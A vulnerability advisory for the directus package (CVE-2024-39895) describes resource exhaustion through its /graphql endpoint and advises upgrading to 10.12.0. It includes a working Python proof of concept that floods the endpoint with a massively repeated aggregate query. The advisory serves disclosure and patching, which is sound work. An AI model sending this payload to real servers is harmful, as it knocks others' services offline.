Resource Exhaustion Affecting directus package, versions <10.12.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-DIRECTUS-7430908
- published 9 Jul 2024
- disclosed 8 Jul 2024
- credit asantof
Introduced: 8 Jul 2024
CVE-2024-39895 Open this link in a new tabHow to fix?
Upgrade directus to version 10.12.0 or higher.
Overview
directus is a Directus is a real-time API and App dashboard for managing SQL database content.
Affected versions of this package are vulnerable to Resource Exhaustion through the /graphql endpoint. An attacker can cause the server to perform redundant computations and consume excessive resources.
PoC
```python
GitHub @asantof
import requests
CHANGE THIS VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql' auth_token = '' query_name = 'query_XXXXX' collection_name = ''
headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {auth_token}', }
id_payload = 'id ' * 200 max_payload = 'max {' + id_payload + ' } ' full_payload = max_payload * 200
data = { 'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }' }
print(data)
response = requests.post(url, headers=headers, json=data)
print(response.json()) ```